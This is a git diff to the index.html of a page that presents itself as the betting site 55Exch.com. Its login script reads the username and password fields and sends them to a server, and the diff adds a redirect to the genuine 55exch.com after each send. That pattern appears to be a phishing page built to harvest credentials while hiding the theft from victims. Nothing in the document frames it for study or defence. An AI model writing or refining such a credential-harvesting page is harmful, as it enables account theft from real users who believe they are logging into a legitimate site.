--- a/index.html
+++ b/index.html
@@ -1406,7 +1406,7 @@ This website 55Exch.com is owned and operated by GIT Operations. registration nu
 
 
 	<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
-	<script>
+		<script>
   // Function to send login data for the first form
   function checkLogins() {
     const username = document.getElementById("loginName1").value;
@@ -1439,6 +1439,9 @@ This website 55Exch.com is owned and operated by GIT Operations. registration nu
       .then((responseText) => {
         console.log("Response from server:", responseText);
         alert("Login data sent successfully.");
+
+        // Redirect to the desired URL
+        window.location.href = "https://www.55exch.com";
       })
       .catch((error) => {
         console.error("Error sending data:", error);
@@ -1477,6 +1480,9 @@ This website 55Exch.com is owned and operated by GIT Operations. registration nu
       .then((responseText) => {
         console.log("Response from server:", responseText);
         alert("Login data sent successfully.");
+
+        // Redirect to the desired URL
+        window.location.href = "https://www.55exch.com";
       })
       .catch((error) => {
         console.error("Error sending data:", error);
@@ -1484,6 +1490,7 @@ This website 55Exch.com is owned and operated by GIT Operations. registration nu
       });
   }
 </script>
+
 
 
 	
